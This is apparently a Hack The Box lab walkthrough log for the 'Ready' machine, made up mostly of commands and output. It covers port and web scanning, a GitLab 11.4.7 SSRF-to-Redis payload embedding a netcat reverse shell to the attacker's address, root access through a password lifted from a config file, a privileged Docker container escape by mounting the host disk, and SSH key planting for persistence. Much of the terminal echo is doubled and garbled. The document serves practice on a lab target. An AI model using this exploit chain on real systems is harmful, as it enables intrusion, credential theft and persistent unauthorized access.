$ sudo nmap -p- -T4 -A 10.10.10.220
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
$ nikto -h http://10.10.10.220:5080
+ Server: nginx
+ Uncommon header 'x-runtime' found, with contents: 0.012271
+ Uncommon header 'x-request-id' found, with contents: 5e05f10f-bc4b-46b6-8ed0-2b3a6b0e16f7
+ Root page / redirects to: http://10.10.10.220/users/sign_in
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/autocomplete/users/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/search/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/help/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/users/sign_in/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 53 entries which should be manually viewed.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to / over HTTP/1.0. The value is "172.19.0.2".
+ /help/: Help directory should not be accessible
+ OSVDB-3092: /public/: This might be interesting...
+ OSVDB-3092: /search.vts: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ Uncommon header 'x-gitlab-custom-error' found, with contents: 1
+ /help.php: A help file was found.
+ /.well-known/openid-configuration: OpenID Provider Configuration Information.
$ dirb http://10.10.10.220:5080
---- Scanning URL: http://10.10.10.220:5080/ ----
+ http://10.10.10.220:5080/explore (CODE:200|SIZE:13343)
+ http://10.10.10.220:5080/favicon.ico (CODE:301|SIZE:174)
+ http://10.10.10.220:5080/groups (CODE:302|SIZE:105)
+ http://10.10.10.220:5080/help (CODE:200|SIZE:37973)
+ http://10.10.10.220:5080/projects (CODE:302|SIZE:98)
+ http://10.10.10.220:5080/public (CODE:200|SIZE:13422)
+ http://10.10.10.220:5080/robots.txt (CODE:200|SIZE:2095)
+ http://10.10.10.220:5080/root (CODE:200|SIZE:15795)
+ http://10.10.10.220:5080/Root (CODE:302|SIZE:95)
+ http://10.10.10.220:5080/search (CODE:200|SIZE:12693)
+ http://10.10.10.220:5080/snippets (CODE:302|SIZE:107)
+ http://10.10.10.220:5080/test (CODE:200|SIZE:15754)
kali@kali:~/0.htb/machines/Ready220$ curl http://10.10.10.220:5080/robots.txt
# See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow: /
# Add a 1 second delay between successive requests to the same server, limits resources used by crawler
# Only some crawlers respect this setting, e.g. Googlebot does not
# Crawl-delay: 1
# Based on details in https://gitlab.com/gitlab-org/gitlab-ce/blob/master/config/routes.rb, https://gitlab.com/gitlab-org/gitlab-ce/blob/master/spec/routing, and using application
User-Agent: *
Disallow: /autocomplete/users
Disallow: /search
Disallow: /api
Disallow: /admin
Disallow: /profile
Disallow: /dashboard
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in
# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw
# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/
kali@kali:~/0.htb/machine
GitLab Community Edition 11.4.7
CVE-2018-14364,CVE-2018-19571,CVE-2018-19585,CVE-2016-9086,CVE-2020-10977
/usr/share/exploitdb/exploits/ruby/webapps/49257.py
GitLab 11.4.7 Remote Code Execution
$ nc -lvp 1234
listening on [any] 1234 ...
New project > Import project > Repo by URL SSRF
load the following payload into project_import_url
Payload:
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash 10.10.14.133 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
kali@kali:~/0.htb/machines/Ready220$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.220] 47116
python3 -c "import pty;pty.spawn('/bin/bash')"
git@gitlab:~/gitlab-rails/working$ eexxpoporrtt TTEERRMM==xxtteerrmm
git@gitlab:/home/dude$ llss
user.txt
git@gitlab:/home/dude$ cacatt uusseerr.t.txxtt
e1e30b052b6ec0670698805d745e7682
git@gitlab:/home/dude$
git@gitlab:/opt/backup$ ccaatt ggiittllaabb..rrbb||ggrrepep ssmmttpp
###! Docs: https://docs.gitlab.com/omnibus/settings/smtp.html
###! **Use smtp instead of sendmail/postfix.**
# gitlab_rails['smtp_enable'] = true
# gitlab_rails['smtp_address'] = "smtp.server"
# gitlab_rails['smtp_port'] = 465
# gitlab_rails['smtp_user_name'] = "smtp user"
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
# gitlab_rails['smtp_domain'] = "example.com"
# gitlab_rails['smtp_authentication'] = "login"
# gitlab_rails['smtp_enable_starttls_auto'] = true
# gitlab_rails['smtp_tls'] = false
# gitlab_rails['smtp_openssl_verify_mode'] = 'none'
# gitlab_rails['smtp_ca_path'] = "/etc/ssl/certs"
# gitlab_rails['smtp_ca_file'] = "/etc/ssl/certs/ca-certificates.crt"
git@gitlab:/opt/backup$
git@gitlab:/opt/backup$ ssuu rroootot
Password: wW59U!ZKMbG9+*#h
root@gitlab:/opt/backup#
root@gitlab:/opt/backup# llss --lla a/ /rroootot
total 24
drwx------ 1 root root 4096 Dec 13 15:06 .
drwxr-xr-x 1 root root 4096 Dec 1 12:41 ..
lrwxrwxrwx 1 root root 9 Dec 7 16:56 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Dec 7 16:49 .ssh
-rw------- 1 root root 1565 Dec 13 15:06 .viminfo
root@gitlab:/opt/backup#
As we are inside a docker container, nothing inside /root
brief info about escaping dokcer privilaged containers
https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1
root@gitlab:/opt/backup# llss //ttmmpp//tteestst
root@gitlab:/opt/backup# mmkkddiirr //ttmmpp//ttesestt
mkdir: cannot create directory '/tmp/test': File exists
root@gitlab:/opt/backup# mmoouunntt /d/deevv//ssddaa22 //ttmmpp//tteesstt
root@gitlab:/opt/backup# ccd d //tmtmpp//tteesstt
root@gitlab:/tmp/test# ls ls -l-laa
total 100
drwxr-xr-x 20 root root 4096 Dec 7 17:44 .
drwxrwxrwt 1 root root 4096 Apr 22 18:15 ..
lrwxrwxrwx 1 root root 7 Apr 23 2020 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Jul 3 2020 boot
drwxr-xr-x 2 root root 4096 May 7 2020 cdrom
drwxr-xr-x 5 root root 4096 Dec 4 15:20 dev
drwxr-xr-x 101 root root 4096 Feb 11 14:31 etc
drwxr-xr-x 3 root root 4096 Jul 7 2020 home
lrwxrwxrwx 1 root root 7 Apr 23 2020 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Apr 23 2020 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Apr 23 2020 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Apr 23 2020 libx32 -> usr/libx32
drwx------ 2 root root 16384 May 7 2020 lost+found
drwxr-xr-x 2 root root 4096 Apr 23 2020 media
drwxr-xr-x 2 root root 4096 Apr 23 2020 mnt
drwxr-xr-x 3 root root 4096 Jun 15 2020 opt
drwxr-xr-x 2 root root 4096 Apr 15 2020 proc
drwx------ 10 root root 4096 Dec 7 17:02 root
drwxr-xr-x 10 root root 4096 Apr 23 2020 run
lrwxrwxrwx 1 root root 8 Apr 23 2020 sbin -> usr/sbin
drwxr-xr-x 6 root root 4096 May 7 2020 snap
drwxr-xr-x 2 root root 4096 Apr 23 2020 srv
drwxr-xr-x 2 root root 4096 Apr 15 2020 sys
drwxrwxrwt 12 root root 12288 Apr 22 23:48 tmp
drwxr-xr-x 14 root root 4096 Apr 23 2020 usr
drwxr-xr-x 14 root root 4096 Dec 4 15:20 var
root@gitlab:/tmp/test# ccaatt //ttmmpp//tteesstt//rorooott//rroooott//^[[^J
cat: /tmp/test/root/root/: No such file or directory
root@gitlab:/tmp/test# cacatt //ttmmpp//ttesestt//rroooott//rroooott..ttxxtt
b7f98681505cd39066f67147b103c2b3
---------------let us root---------------------------------------------------------
kali@kali:~/0.htb/machines/Ready220$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:5AXb1CRlW831MN/vcd4vqVdamrdgQiuwIWNnuL2NpJQ kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| . o++ +oo|
| = o.o +=|
| o o . +|
| .o . .|
| = =S . .o|
| . O + . . o*|
| E + . o o B+|
| . o + . o O o|
| . o . .o +o|
+----[SHA256]-----+
kali@kali:~/0.htb/machines/Ready220$ cat ~/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali
root@gitlab:/tmp/test/root/.ssh# eecchhoo ''ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQdWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali'' >>>> aauutthhooririzzeedd__kkeeyyssAB3NzaC1yc2EAAAADAQABAAABgQDeY
root@gitlab:/tmp/test/root/.ssh# llss
authorized_keys id_rsa id_rsa.pub
root@gitlab:/tmp/test/root/.ssh#
kali@kali:~/0.htb/machines/Ready220$ ssh -i id_rsa root@10.10.10.220
Warning: Identity file id_rsa not accessible: No such file or directory.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 4.0
186 updates can be installed immediately.
89 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Feb 11 14:28:18 2021
root@ready:~# ls
docker-gitlab ready-channel root.txt snap
root@ready:~# cat root.txt
b7f98681505cd39066f67147b103c2b3
root@ready:~#